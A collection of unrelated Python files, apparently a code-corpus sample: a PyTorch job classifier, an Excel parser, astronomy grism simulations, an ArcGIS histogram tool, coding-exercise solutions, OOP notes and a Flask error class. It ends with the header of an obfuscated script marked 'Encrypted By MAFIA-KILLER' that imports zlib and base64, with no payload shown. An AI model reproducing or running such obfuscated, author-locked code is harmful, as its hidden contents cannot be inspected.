data = Variable(torch.from_numpy(data))
final_label = Variable(torch.from_numpy(final_label))
# Fixed 18000-row train/test split.
train_data = data[:18000]
train_label = final_label[:18000]
test_data = data[18000:length]
test_label = final_label[18000:length]
train_dataset = myDataset(train_data, train_label)
test_dataset = myDataset(test_data, test_label)
train_loader = DataLoader(dataset=train_dataset,
                          batch_size=BATCH_SIZE,
                          shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
                         batch_size=BATCH_SIZE,
                         shuffle=False)
# Training settings
# batch_size = 64
# # MNIST Dataset
# train_dataset = datasets.MNIST(root='./mnist_data/',
# train=True,
# transform=transforms.ToTensor(),
# download=True)
# test_dataset = datasets.MNIST(root='./mnist_data/',
# train=False,
# transform=transforms.ToTensor())
# # Data Loader (Input Pipeline)
# train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
# batch_size=batch_size,
# shuffle=True)
# test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
# batch_size=batch_size,
# shuffle=False)
class myModel(nn.Module):
    """Three-layer MLP with sigmoid activations: 13 features -> 15 scores."""

    def __init__(self):
        """Instantiate the three nn.Linear layers and the activations."""
        super(myModel, self).__init__()
        self.l1 = nn.Linear(13, 50)
        self.l2 = nn.Linear(50, 30)
        self.l3 = nn.Linear(30, 15)
        self.sigmoid = nn.Sigmoid()
        self.relu = nn.ReLU()

    def forward(self, x):
        """Flatten the input to (N, 13) and apply sigmoid after each layer."""
        hidden = self.sigmoid(self.l1(x.view(-1, 13)))
        hidden = self.sigmoid(self.l2(hidden))
        return self.sigmoid(self.l3(hidden))
class Model(nn.Module):
    """Three-layer MLP with sigmoid activations: 8 features -> 1 output."""

    def __init__(self):
        """Instantiate the three nn.Linear layers and the activations."""
        super(Model, self).__init__()
        self.l1 = nn.Linear(8, 6)
        self.l2 = nn.Linear(6, 4)
        self.l3 = nn.Linear(4, 1)
        self.sigmoid = nn.Sigmoid()
        self.relu = nn.ReLU()

    def forward(self, x):
        """Apply sigmoid after each of the three linear layers."""
        hidden = self.sigmoid(self.l1(x))
        hidden = self.sigmoid(self.l2(hidden))
        return self.sigmoid(self.l3(hidden))
class Net(nn.Module):
    """Five-layer ReLU MLP for flattened 28x28 images; returns raw logits."""

    def __init__(self):
        super(Net, self).__init__()
        self.l1 = nn.Linear(784, 520)
        self.l2 = nn.Linear(520, 320)
        self.l3 = nn.Linear(320, 240)
        self.l4 = nn.Linear(240, 120)
        self.l5 = nn.Linear(120, 10)

    def forward(self, x):
        hidden = x.view(-1, 784)  # Flatten the data (n, 1, 28, 28) -> (n, 784)
        for layer in (self.l1, self.l2, self.l3, self.l4):
            hidden = F.relu(layer(hidden))
        # Logits: no final activation (CrossEntropyLoss applies log-softmax).
        return self.l5(hidden)
# our model
model = myModel()
# Construct our loss function and an Optimizer. The call to model.parameters()
# in the SGD constructor will contain the learnable parameters of the two
# nn.Linear modules which are members of the model.
# NOTE(review): CrossEntropyLoss expects raw logits, but myModel.forward ends
# with a sigmoid -- it trains, but squashing the scores first is unusual.
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=0.01)
def train(epoch):
    """Run one training epoch over train_loader, logging every 100 batches.

    Fixes: `loss.data[0]` (0-dim tensor indexing, removed after PyTorch 0.4)
    is replaced by `loss.item()`, and the target dtype conversion uses
    `.long()` instead of rebuilding the tensor via `torch.tensor(...)`
    (which copies and warns on tensor inputs).
    """
    model.train()
    for batch_idx, (data, target) in enumerate(train_loader):
        data, target = Variable(data), Variable(target)
        optimizer.zero_grad()
        output = model(data)
        target = target.long()  # CrossEntropyLoss requires integer class ids
        loss = criterion(output, target)
        loss.backward()
        optimizer.step()
        if batch_idx % 100 == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.dataset),
                100. * batch_idx / len(train_loader), loss.item()))
def my_test():
    """Evaluate the model on test_loader; print average loss and accuracy.

    Fixes: `.data[0]` -> `.item()` (0-dim tensor indexing was removed after
    PyTorch 0.4) and the per-batch correct count is reduced with `.item()`
    so `correct` stays a plain Python int.
    """
    model.eval()
    test_loss = 0
    correct = 0
    for data, target in test_loader:
        data, target = Variable(data), Variable(target)
        output = model(data)
        target = target.long()
        # sum up batch loss
        test_loss += criterion(output, target).item()
        # get the index of the max
        pred = output.data.max(1, keepdim=True)[1]
        target = target.view(pred.size(0), 1)
        correct += pred.eq(target.data.view_as(pred)).cpu().sum().item()
    test_loss /= len(test_loader.dataset)
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(test_loader.dataset),
        100. * correct / len(test_loader.dataset)))
# Training loop
# Run the full train/evaluate cycle once per epoch.
for epoch in range(epochs):
    train(epoch)
    my_test()
# In[ ]:
##아래는 데이터 만드는 과정입니다.
# In[5]:
# Persist the entire trained model object (architecture + weights).
torch.save(model,'saved_model')
# In[ ]:
# In[43]:
# Reload the model and run one hand-written 13-feature sample through it.
model2 = torch.load('saved_model')
myinput = [1,2,2,1,0,2,4,2,4,2,4,2,4]
myinput = np.array(myinput,dtype=np.float32)
myinput = Variable(torch.from_numpy(myinput))
output = model2(myinput)
# print(output)
output = output.view(-1)
# Class indices sorted by descending score.
# NOTE(review): this shadows the builtin `list` from here on.
list = [i[0] for i in sorted(enumerate(output), key=lambda x:x[1], reverse=True)]
# print(output)
pos_list = sorted(output, reverse=True)
# print(pos_list)
# print(list)
# print(label_vocab)
# Normalise the sorted scores so they sum to 1 (pseudo-probabilities).
sum_ = sum(pos_list)
# print(sum_)
# print(label_vocab.items())
job_list_ = []
pos_list_ = []
print(pos_list)
for num in pos_list:
    pos_list_.append(num/sum_)
print(pos_list_)
# Reverse-map each class index back to its job-name string via label_vocab.
for num in list:
    a=[name for name, age in label_vocab.items() if age == num]
    job_list_.append(a[0])
print(job_list_)
# In[ ]:
# In[8]:
def load_data():
    """Generate a synthetic job label for every row of data.csv.

    The dominant value among the first five feature columns picks one of
    five job pools (ties broken uniformly at random), then a job name is
    drawn uniformly from that pool.  Returns the list of job-name strings.

    Refactor: the five copy-pasted if/elif random-choice blocks are
    collapsed into a pool table, and the unused `com` variable is dropped.
    The two randrange draws per row happen in the original order (tie
    index first, then job), so seeded runs are unchanged.
    """
    df = pd.read_csv('data.csv', error_bad_lines=False)
    feature_columns = ['mok', 'hwa', 'to', 'gm', 'su',
                       'E', 'I', 'S', 'N', 'T', 'F', 'J', 'P']
    length = len(df['mok'])
    data = []
    for i in range(0, length):
        data.append([df[column][i] for column in feature_columns])
    print(data[0])
    print(data[1])
    # One job pool per dominant feature index (0..4).
    job_pools = [
        ['바리스타', '매장', '의류'],
        ['레스토랑', '사무보조', '미용'],
        ['생산', '주방', '회계'],
        ['유아', '스포츠', 'PC'],
        ['배달', '창고', '서빙'],
    ]
    jobs = []
    for data_ in data:
        select_list = data_[:5]
        max_ = max(select_list)
        # All indices tied for the maximum; pick one at random.
        tied = [i for i, x in enumerate(select_list) if x == max_]
        pool = job_pools[tied[randrange(0, len(tied))]]
        jobs.append(pool[randrange(0, len(pool))])
    print(jobs)
    return jobs
# In[9]:
# Generate the synthetic labels and write them to an Excel sheet.
jobs = load_data()
data = DataFrame(jobs)
print(data)
data.to_excel('label_2.xlsx', sheet_name='sheet1')
# data.to_csv('label_2.csv', index=False, header=False, encoding='ms949')
# f = open('label.csv', 'w', encoding='euc_kr', newline='')
# wr = csv.writer(f)
# for job in jobs:
# wr.writerow(job)
# In[ ]:
|
import openpyxl
import pprint
# data = {id_: {
# "info": (name_, gender_: xxx, age_: xx},
# date_: tx_,
# ...
# }
# }
# ...
# }
# Parsed records keyed by patient id (see the schema sketch above).
data = {}
if __name__ == '__main__':
    # NOTE(review): hard-coded Windows path -- parameterise before reuse.
    wb = openpyxl.load_workbook('D:\\test.xlsx')
    for sh in wb:
        # Bottom-right cell reference of this sheet (currently unused).
        rightlowercorner = 'E' + str(sh.max_row)
        #for row in sh.iter_rows(min_row=2, max_col=3, max_row=sh.max_row, values_only=True):
        # NOTE(review): max_row=3 limits the scan to the first two data rows --
        # presumably a debugging leftover; the commented line above reads all rows.
        for row in sh.iter_rows(min_row=2, max_col=9, max_row=3, values_only=True):
            date_, id_, name_, gender_, age_, sx_, duration_, dx_, tx_ = row
            # Make sure the key for this id exists
            data.setdefault(id_, {"info": (name_, gender_, age_)})
            data[id_][date_] = tx_
    pprint.pprint(data)
|
# Read an element count and the values, then echo the first n values in
# reverse order, space-separated (trailing space, no trailing newline).
n = int(input())
values = input().split()
for pos in range(n):
    values[pos] = int(values[pos])
for value in reversed(values[:n]):
    print(value, end=' ')
|
# encoding: utf-8
'''
https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/g3doc/convert/python_api.md
'''
import tensorflow as tf
# Convert a TF1 SavedModel (tag 'train') into a TFLite flatbuffer.
pb_file_path = '../caffe2tensorflow/caffe_fcn8s/'
with tf.Session(graph=tf.Graph()) as sess:
    tf.saved_model.loader.load(sess, ['train'], pb_file_path)
    sess.run(tf.global_variables_initializer())
    input_x = sess.graph.get_tensor_by_name('input:0')
    output_y = sess.graph.get_tensor_by_name('crop_to_bounding_box_2/Slice:0')
    converter = tf.lite.TFLiteConverter.from_session(sess, [input_x], [output_y])
    tflite_model = converter.convert()
# Bug fix: the original `open(...).write(...)` never closed the file handle;
# the context manager guarantees the model bytes are flushed and closed.
with open("./model/converted_model.tflite", "wb") as out_file:
    out_file.write(tflite_model)
import astropy
import astropy.io.fits as pyfits
import matplotlib
import matplotlib.pyplot as plt
import scipy
import scipy.ndimage
import showgalaxy
import make_color_image
import numpy.random as random
import gfs_sublink_utils as gsu
import numpy as np
import congrid
# NIRISS G235H/G235M wavelength grids (microns): 1.75-2.25 um sampled at
# 2 um divided by the grating resolving power (R=2300 and R=800).
ug_g235h=np.linspace(1.75,2.25,int( (2.25-1.75)/(2.0/2300.0)))
ug_g235m=np.linspace(1.75,2.25,int( (2.25-1.75)/(2.0/800.0)))
def get_integrated_spectrum(bbfile):
    """Pull the integrated SED and broadband fluxes out of a Sunrise file.

    Returns (spectrum flux, spectrum wavelengths [um],
             filter fluxes, filter effective wavelengths [um]).
    """
    hdus = pyfits.open(bbfile)
    integrated = hdus['INTEGRATED_QUANTITIES'].data
    spec_flux = integrated['L_lambda_nonscatter0']
    spec_lam_um = 1.0e6 * integrated['lambda']
    filters = hdus['FILTERS'].data
    band_flux = filters['L_lambda_eff_nonscatter0']
    band_lam_um = 1.0e6 * filters['lambda_eff']
    return spec_flux, spec_lam_um, band_flux, band_lam_um
def make_niriss_trace(bbfile='grism.fits',outname='grismtrace',ybox=None,xbox=None,noisemaxfact=0.05,alph=1.0,Q=1.0,rotate=False,resize=None):
    """Simulate a JWST/NIRISS slitless-grism trace from a Sunrise datacube.

    Each in-band wavelength slice of the camera cube is shifted along the
    dispersion axis by its grism offset and co-added, blurred, optionally
    rotated/resized, given additive Gaussian noise (noisemaxfact scales the
    noise relative to the image peak), and saved as <outname>.png/.fits.

    Returns (noisy trace, clean trace, integrated spectrum, spectrum
    wavelengths, filter fluxes, filter wavelengths).
    NOTE(review): ybox/xbox/alph/Q are currently unused parameters.
    """
    go=pyfits.open(bbfile)
    redshift=go['BROADBAND'].header['REDSHIFT']
    # NIRISS plate scale (arcsec/pixel) and grism dispersion (nm/pixel).
    niriss_pix_as=0.065
    f200_nm_per_pix=9.5/2.0
    # Wavelength window (microns) actually dispersed onto the trace.
    min_lam=1.750
    max_lam=2.220
    hdu=go['CAMERA0-BROADBAND-NONSCATTER']
    cube=hdu.data[6:,:,:] #L_lambda units!
    #cube=np.flipud(cube) ; print(cube.shape)
    fil=go['FILTERS']
    lamb=fil.data['lambda_eff'][6:]*1.0e6
    flux=fil.data['L_lambda_eff_nonscatter0'][6:]
    # Mask of slices that fall inside the wavelength window.
    g_i = (lamb >= min_lam) & (lamb <= max_lam)
    # Angular scale at the source redshift.
    arcsec_per_kpc= gsu.illcos.arcsec_per_kpc_proper(redshift)
    kpc_per_arcsec=1.0/arcsec_per_kpc.value
    im_kpc=hdu.header['CD1_1']
    niriss_kpc_per_pix=niriss_pix_as*kpc_per_arcsec
    # Dispersed-trace length converted to simulation-image pixels.
    total_width_pix=(1.0e3)*(max_lam-min_lam)/f200_nm_per_pix
    total_width_kpc=total_width_pix*niriss_kpc_per_pix
    total_width_impix=int(total_width_kpc/im_kpc)
    delta_lam=(max_lam-min_lam)/total_width_impix #microns/pix
    psf_arcsec=0.13 #????
    psf_kpc=psf_arcsec*kpc_per_arcsec
    psf_impix=psf_kpc/im_kpc
    # Cross-dispersion stamp width (pixels) and full dispersed-image width.
    imw_cross=32
    imw_disp=total_width_impix+imw_cross
    Np=cube.shape[-1]
    mid = np.int64(Np/2)
    delt=np.int64(imw_cross/2)
    output_image=np.zeros_like( np.ndarray(shape=(imw_disp,imw_cross),dtype='float' ))
    #r = r[mid-delt:mid+delt,mid-delt:mid+delt]
    output_image.shape
    # Central imw_cross x imw_cross cutout of every in-band slice.
    small_cube=cube[g_i,mid-delt:mid+delt,mid-delt:mid+delt]
    # Add each slice at its wavelength-dependent dispersion offset.
    for i,l in enumerate(lamb[g_i]):
        di=int( (l-min_lam)/delta_lam )
        this_cube=small_cube[i,:,:]*l**2 #convert to Janskies-like
        if rotate is True:
            this_cube = np.rot90(this_cube)
        #if i==17:
        #    this_cube[30,30] = 1.0e3
        #print(i,l/(1.0+redshift),int(di),np.sum(this_cube),this_cube.shape,output_image.shape,output_image[di:di+imw_cross,:].shape)
        output_image[di:di+imw_cross,:]=output_image[di:di+imw_cross,:]+this_cube
    # Smooth along the dispersion axis and by the PSF (FWHM -> sigma) across it.
    output_image=scipy.ndimage.gaussian_filter(output_image,sigma=[4.0,psf_impix/2.355])
    new_thing = np.transpose(np.flipud(output_image))
    if resize is not None:
        new_thing = congrid.congrid(new_thing, resize)
    # Additive Gaussian noise scaled to the image maximum.
    nr = noisemaxfact*np.max(new_thing)*random.randn(new_thing.shape[0],new_thing.shape[1])
    #thing=make_color_image.make_interactive(new_thing+nr,new_thing+nr,new_thing+nr,alph=alph,Q=Q)
    #thing=1.0-np.fliplr(np.transpose(thing,axes=[1,0,2]))
    thing=np.fliplr(new_thing+nr)
    f=plt.figure(figsize=(25,6))
    f.subplots_adjust(wspace=0.0,hspace=0.0,top=0.99,right=0.99,left=0,bottom=0)
    axi=f.add_subplot(1,1,1)
    axi.imshow( (thing),aspect='auto',origin='left',interpolation='nearest',cmap='Greys_r')
    f.savefig(outname+'.png',dpi=500)
    plt.close(f)
    #[ybox[0]:ybox[1],xbox[0]:xbox[1]]
    #[50:125,120:820,:]
    new_hdu=pyfits.PrimaryHDU(thing)
    new_list=pyfits.HDUList([new_hdu])
    new_list.writeto(outname+'.fits',overwrite=True)
    f,l,f_im,l_im=get_integrated_spectrum(bbfile)
    return thing, new_thing, f, l, f_im, l_im
def make_simple_trace(bbfile='grism.fits',outname='grismtrace',ybox=None,xbox=None,noisemaxfact=0.05,alph=1.0,Q=1.0,rotate=False,resize=None):
    """Simulate an HST/WFC3 G141 slitless-grism trace from a Sunrise datacube.

    Same procedure as make_niriss_trace but with WFC3 plate scale, G141
    dispersion and a wider cross-dispersion stamp.  Saves the noisy trace
    as <outname>.png and <outname>.fits and returns (noisy, clean) images.

    Fix: `writeto(..., clobber=True)` -> `overwrite=True`; the `clobber`
    keyword was deprecated and then removed from astropy, and the sibling
    make_niriss_trace already uses `overwrite=True`.
    NOTE(review): ybox/xbox/alph/Q are currently unused parameters.
    """
    go=pyfits.open(bbfile)
    redshift=go['BROADBAND'].header['REDSHIFT']
    # WFC3 plate scale (arcsec/pixel) and G141 dispersion (nm/pixel).
    wfc3_pix_as=0.13
    g141_nm_per_pix=4.65
    # G141 wavelength window (microns).
    min_lam=1.075
    max_lam=1.700
    hdu=go['CAMERA0-BROADBAND-NONSCATTER']
    cube=hdu.data #L_lambda units!
    #cube=np.flipud(cube) ; print(cube.shape)
    fil=go['FILTERS']
    lamb=fil.data['lambda_eff']*1.0e6
    flux=fil.data['L_lambda_eff_nonscatter0']
    # Mask of slices that fall inside the G141 window.
    g141_i = (lamb >= min_lam) & (lamb <= max_lam)
    # Angular scale at the source redshift.
    arcsec_per_kpc= gsu.illcos.arcsec_per_kpc_proper(redshift)
    kpc_per_arcsec=1.0/arcsec_per_kpc.value
    im_kpc=hdu.header['CD1_1']
    print('pix size kpc: ', im_kpc)
    wfc3_kpc_per_pix=wfc3_pix_as*kpc_per_arcsec
    # Dispersed-trace length converted to simulation-image pixels.
    total_width_pix=(1.0e3)*(max_lam-min_lam)/g141_nm_per_pix
    total_width_kpc=total_width_pix*wfc3_kpc_per_pix
    total_width_impix=int(total_width_kpc/im_kpc)
    delta_lam=(max_lam-min_lam)/total_width_impix #microns/pix
    psf_arcsec=0.18
    psf_kpc=psf_arcsec*kpc_per_arcsec
    psf_impix=psf_kpc/im_kpc
    # Cross-dispersion stamp width (pixels) and full dispersed-image width.
    imw_cross=200
    imw_disp=total_width_impix+imw_cross
    Np=cube.shape[-1]
    mid = np.int64(Np/2)
    delt=np.int64(imw_cross/2)
    output_image=np.zeros_like( np.ndarray(shape=(imw_disp,imw_cross),dtype='float' ))
    #r = r[mid-delt:mid+delt,mid-delt:mid+delt]
    output_image.shape
    # Central imw_cross x imw_cross cutout of every in-band slice.
    small_cube=cube[g141_i,mid-delt:mid+delt,mid-delt:mid+delt]
    # Add each slice at its wavelength-dependent dispersion offset.
    for i,l in enumerate(lamb[g141_i]):
        di=int( (l-min_lam)/delta_lam )
        this_cube=small_cube[i,:,:]*l**2 #convert to Janskies-like
        if rotate is True:
            this_cube = np.rot90(this_cube)
        #if i==17:
        #    this_cube[30,30] = 1.0e3
        #print(i,l/(1.0+redshift),int(di),np.sum(this_cube),this_cube.shape,output_image.shape,output_image[di:di+imw_cross,:].shape)
        output_image[di:di+imw_cross,:]=output_image[di:di+imw_cross,:]+this_cube
    # Smooth along the dispersion axis and by the PSF (FWHM -> sigma) across it.
    output_image=scipy.ndimage.gaussian_filter(output_image,sigma=[4,psf_impix/2.355])
    new_thing = np.transpose(np.flipud(output_image))
    if resize is not None:
        new_thing = congrid.congrid(new_thing, resize)
    # Additive Gaussian noise scaled to the image maximum.
    nr = noisemaxfact*np.max(new_thing)*random.randn(new_thing.shape[0],new_thing.shape[1])
    #thing=make_color_image.make_interactive(new_thing+nr,new_thing+nr,new_thing+nr,alph=alph,Q=Q)
    #thing=1.0-np.fliplr(np.transpose(thing,axes=[1,0,2]))
    thing=np.fliplr(new_thing+nr)
    f=plt.figure(figsize=(25,6))
    f.subplots_adjust(wspace=0.0,hspace=0.0,top=0.99,right=0.99,left=0,bottom=0)
    axi=f.add_subplot(1,1,1)
    axi.imshow( (thing),aspect='auto',origin='left',interpolation='nearest',cmap='Greys_r')
    f.savefig(outname+'.png',dpi=500)
    plt.close(f)
    #[ybox[0]:ybox[1],xbox[0]:xbox[1]]
    #[50:125,120:820,:]
    new_hdu=pyfits.PrimaryHDU(thing)
    new_list=pyfits.HDUList([new_hdu])
    new_list.writeto(outname+'.fits',overwrite=True)
    return thing, new_thing
|
import arcpy
from arcpy import env
from arcpy.sa import *
import pandas as pd
import numpy as np
import os
import time
import sys
arcpy.env.parallelProcessingFactor = "100%"
# NOTE(review): time.clock() was removed in Python 3.8; these timers only
# run under an older Python runtime -- switch every call to
# time.perf_counter() when porting.
t0 = time.clock()
# Set the environment:
arcpy.env.overwriteOutput = True
scriptPath = arcpy.GetParameter(0)
# NOTE(review): immediately overwrites the parameter value above.
scriptPath = sys.path[0]
#Set variables for script:
StressFieldsUSA_WM = "StressFieldsUSA_WM"
SelectionPolygon = "SelectionPolygon"
# NOTE(review): overwrites the literal assigned on the previous line.
SelectionPolygon = arcpy.GetParameter(1)
TableFromSelection = os.path.join("in_memory", "TableFromSelection")
# make vents and polygon feature layers:
arcpy.MakeFeatureLayer_management(StressFieldsUSA_WM,"StressFieldsFeatLyr")
arcpy.AddMessage("after make vents feat lyr: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.MakeFeatureLayer_management(SelectionPolygon,"PolyFeatLyr")
arcpy.AddMessage("after make poly feat lyr: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# Select vents with polygon:
arcpy.SelectLayerByLocation_management("StressFieldsFeatLyr","COMPLETELY_WITHIN","PolyFeatLyr")
arcpy.AddMessage("after selection: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# Create table from selcted records:
arcpy.CopyRows_management ("StressFieldsFeatLyr", TableFromSelection)
arcpy.AddMessage("after create selection table: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# table to data frame:
##### credit: https://gist.github.com/d-wasserman/e9c98be1d0caebc2935afecf0ba239a0 ####
def arcgis_table_to_dataframe(in_fc, input_fields, query="", skip_nulls=False, null_values=None):
    """Convert an ArcGIS table or feature class into a pandas DataFrame.

    The frame is indexed by the table's ObjectID and restricted to
    `input_fields` (all fields are fetched when the list is empty).
    Uses TableToNumPyArray to get the initial data.
    :param - in_fc - input feature class or table to convert
    :param - input_fields - fields to input into a da numpy converter function
    :param - query - sql like query to filter out records returned
    :param - skip_nulls - skip rows with null values
    :param - null_values - values to replace null values with.
    :returns - pandas dataframe"""
    oid_field = arcpy.Describe(in_fc).OIDFieldName
    if input_fields:
        fetch_fields = [oid_field] + input_fields
    else:
        fetch_fields = [field.name for field in arcpy.ListFields(in_fc)]
    records = arcpy.da.TableToNumPyArray(in_fc, fetch_fields, query, skip_nulls, null_values)
    return pd.DataFrame(records, index=records[oid_field], columns=input_fields)
# Extract only the azimuth column of the selected records.
fc_dataframe = arcgis_table_to_dataframe(TableFromSelection,['AZI'])
arcpy.AddMessage("after converting selection table to data frame: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.AddMessage(fc_dataframe)
#dataframe to histogram array
## run numpy.histogram
##https://numpy.org/doc/stable/reference/generated/numpy.histogram.html ### Just return the array of bin counts as final
AzimuthArray = fc_dataframe
# Creating histogram
# Bin the azimuths into 72 five-degree bins spanning 0-360 degrees.
# NOTE(review): the first np.histogram call discards its result; only the
# second (unpacked) call below is actually used.
np.histogram(AzimuthArray, bins = [0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100,105,110,115,120,125,130,135,140,145,150,155,160,165,170,175,180,185,190,195,200,205,210,215,220,225,230,235,240,245,250,255,260,265,270,275,280,285,290,295,300,305,310,315,320,325,330,335,340,345,350,355,360])
hist, bins = np.histogram(AzimuthArray, bins = [0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100,105,110,115,120,125,130,135,140,145,150,155,160,165,170,175,180,185,190,195,200,205,210,215,220,225,230,235,240,245,250,255,260,265,270,275,280,285,290,295,300,305,310,315,320,325,330,335,340,345,350,355,360])
arcpy.AddMessage(hist)
azimuthList = list(hist)
arcpy.AddMessage(azimuthList)
# return the hitogram array as the final array, make parameter:
arcpy.AddMessage("after creating bins for rose diagram: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.SetParameterAsText(2, azimuthList)
|
def calcula_dominator(A):
    """Return the dominator of A -- the value occupying more than half of
    the positions -- or -1 when no dominator exists.

    Bug fix: when no value dominated (or A was empty), the original fell
    through to `return x` with `x` unbound, raising UnboundLocalError; it
    now returns -1 explicitly.
    """
    dados = {}
    for item in A:
        dados[item] = dados.get(item, 0) + 1
    tamanho = len(A) // 2
    for k, v in dados.items():
        if v > tamanho:
            return k
    return -1
def solution(A):
    # TODO: unimplemented Codility entry point -- presumably meant to
    # delegate to calcula_dominator; note Codility expects an *index* of a
    # dominator occurrence, while calcula_dominator returns the value.
    pass
# Quick manual check: the expected dominator value is 4.
print(calcula_dominator([4,3,4,4,2]))
# https://www.hackerrank.com/challenges/the-time-in-words
import math
import os
import random
import re
import sys
# Complete the timeInWords function below.
def timeInWords(h, m):
    """Return the time h:m (12-hour clock) spelled out in English words.

    Fix: the "minutes to" branch now uses the singular "minute" when exactly
    one minute remains (m == 59); the "past" branch already handled the
    singular case, so the two directions are now consistent.
    """
    if m == 0:
        return (number(h) +' o\' '+'clock' )
    if m == 15:
        return ('quarter past '+ number(h))
    if m == 30:
        return ('half past '+ number(h))
    if m == 45:
        return ('quarter to '+ number(h+1))
    if m <= 30:
        # "past" the current hour; singular for exactly one minute.
        unit = ' minutes past ' if m > 1 else ' minute past '
        return number(m) + unit + number(h)
    # "to" the next hour; singular for exactly one minute remaining.
    remaining = 60 - m
    unit = ' minutes to ' if remaining > 1 else ' minute to '
    return number(remaining) + unit + number(h+1)
def number(n):
    """English words for an integer 1 <= n <= 98.

    Fixes: misspelled 'fiveteen' -> 'fifteen' and 'fivety' -> 'fifty'
    (the wrong words leaked into the output), and exact multiples of ten
    (20, 30, ...) no longer raise KeyError on the missing 0 entry.
    """
    num2words = {1:'one',2:'two',3:'three',4:'four',5:'five',6:'six',7:'seven',8:'eight',9:'nine',10:'ten',11:'eleven',12:'twelve',13:'thirteen',14:'fourteen',15:'fifteen',16:'sixteen',17:'seventeen',18:'eighteen',19:'nineteen'}
    num2words1 =['twenty','thirty','forty','fifty','sixty','seventy','eighty','ninety']
    if 1 <= n <= 19:
        return num2words[n]
    elif 20 <= n < 99:
        tens, below_ten = divmod(n,10)
        if below_ten == 0:
            # Exact multiple of ten: tens word alone.
            return num2words1[tens - 2]
        return num2words1[tens - 2] + ' ' + num2words[below_ten]
if __name__ == '__main__':
    # HackerRank harness: read hour and minute from stdin, write the
    # formatted answer to the file named in OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    h = int(input())
    m = int(input())
    result = timeInWords(h, m)
    fptr.write(result + '\n')
    fptr.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python 学习笔记 之 面向对象编程(3)
# 获取对象信息
import types
# 引入oop2_extends文件
from pkg4_oop import oop2_extends
# 快速打印
from util import p
# -------------------------type()--------------------------
p(type(123)) # type() 判断对象类型 <class 'int'>
p(type(p)) # <class 'function'>
p(type(oop2_extends.animal))
p('type(123) == type("abc") ?', type(123) == type('abc')) # Warning 建议使用isinstance()替代==比较类型
p('type(dog) == type(animal)?', type(oop2_extends.dog) == type(oop2_extends.animal))
p('isinstance(dog,Animal)?', isinstance(oop2_extends.dog, oop2_extends.Animal))
p('is p(*args, **kw) be a function ?', type(p) == types.FunctionType)
p(type(lambda x: x) == types.LambdaType) # True
p('LambdaType', isinstance(lambda x: x, types.LambdaType)) # True 验证 type.LambdaType 是Class类型
p('GeneratorType', isinstance((x for x in range(10)), types.GeneratorType)) # True
p(type((x for x in range(10))) == types.GeneratorType) # True
p('haha is a Husky?', isinstance(oop2_extends.haha, oop2_extends.Husky))
p('haha is Dog?', isinstance(oop2_extends.haha, oop2_extends.Dog))
p('haha is Animal?', isinstance(oop2_extends.haha, oop2_extends.Animal))
p('dogs are Husky?', isinstance(oop2_extends.dog, oop2_extends.Husky))
p('haha is Dog or Cat?', isinstance(oop2_extends.haha, (oop2_extends.Dog, oop2_extends.Cat)))
# --------------------------dir()--------------------------
class TestObject(object):
    """Small demo class for the hasattr/getattr experiments below."""

    def __init__(self):
        # Single instance attribute used by power().
        self.x = 9

    def power(self):
        """Return x squared."""
        return self.x * self.x

    def read(self):
        # Marker method so read_something() finds a 'read' attribute.
        p('TestObject read')
def read_something(fp):
    """Duck-typed read: call fp.read() when available, otherwise None."""
    reader = getattr(fp, 'read', None)
    if reader is None:
        return None
    return reader()
obj = TestObject()
obj2 = TestObject()
p(dir(oop2_extends.cat)) # dir() lists all attributes and methods of an object
p('obj(TestObject) has attr "x" ?', hasattr(obj, 'x')) # does obj have an attribute (variable or method) named x?
p('obj.x =', obj.x)
p('obj(TestObject) has attr "y" ?', hasattr(obj, 'y'))
obj.y = 12 # adds y to the obj *instance* only (not to the TestObject class)
p('add attr "y" into obj')
p('obj(TestObject) has attr "y" ?', hasattr(obj, 'y')) # obj now has y
p('obj2(TestObject) has attr "y" ?', hasattr(obj2, 'y')) # obj2 does not have y
p('obj.y =', obj.y)
p('obj2.y =', getattr(obj2, 'y', None)) # fetch y from obj2 (absent); None is the fallback default
fn = getattr(obj, 'power')
p(type(fn)) # <class 'method'> -- bound methods differ from types.FunctionType
if type(fn) == types.FunctionType:
    p(fn())
else:
    p('type(fn) != types.FunctionType')
read_something(obj) # object that has a read method
read_something(oop2_extends.haha) # object without a read method
|
from werkzeug.exceptions import BadRequest
from flask import jsonify
def handle_invalid_usage(error):
    """Flask error handler: serialize the error's dict form as JSON and
    return it with the error's HTTP status code."""
    body = jsonify(error.to_dict())
    return body, error.status_code
class ValidationError(BadRequest):
    """
    When invalid data is sent to via POST or PUT, this exception gets raised
    :param message: The error message
    :param field: The name of the field that raised the exception, if applicable
    :param status_code: allows overwriting of the default bad request status code, 400
    """
    # Class-level default; shadowed per-instance when __init__ overrides it.
    status_code = 400
    def __init__(self, message, field=None, status_code=None):
        # NOTE(review): calls Exception.__init__ directly, skipping the
        # BadRequest/HTTPException initialisers (description, response) --
        # presumably intentional; confirm werkzeug does not rely on them.
        Exception.__init__(self)
        self.message = message
        if status_code is not None:
            self.status_code = status_code
        self.field = field
    def to_dict(self):
        """
        Returns a REST-friendly API response
        """
        # NOTE(review): when field is None, the payload key serialises as null.
        return {self.field: self.message}
class ConfigException(Exception):
    """
    This exception gets raised if the config file is invalid.
    Carries only the message passed by the raiser; no extra state.
    """
    pass
|
#Encrypted By MAFIA-KILLER
#WHATSAPP : +92132197796/DON,T TRY TO EDIT THIS TOOL/
import zlib, base64
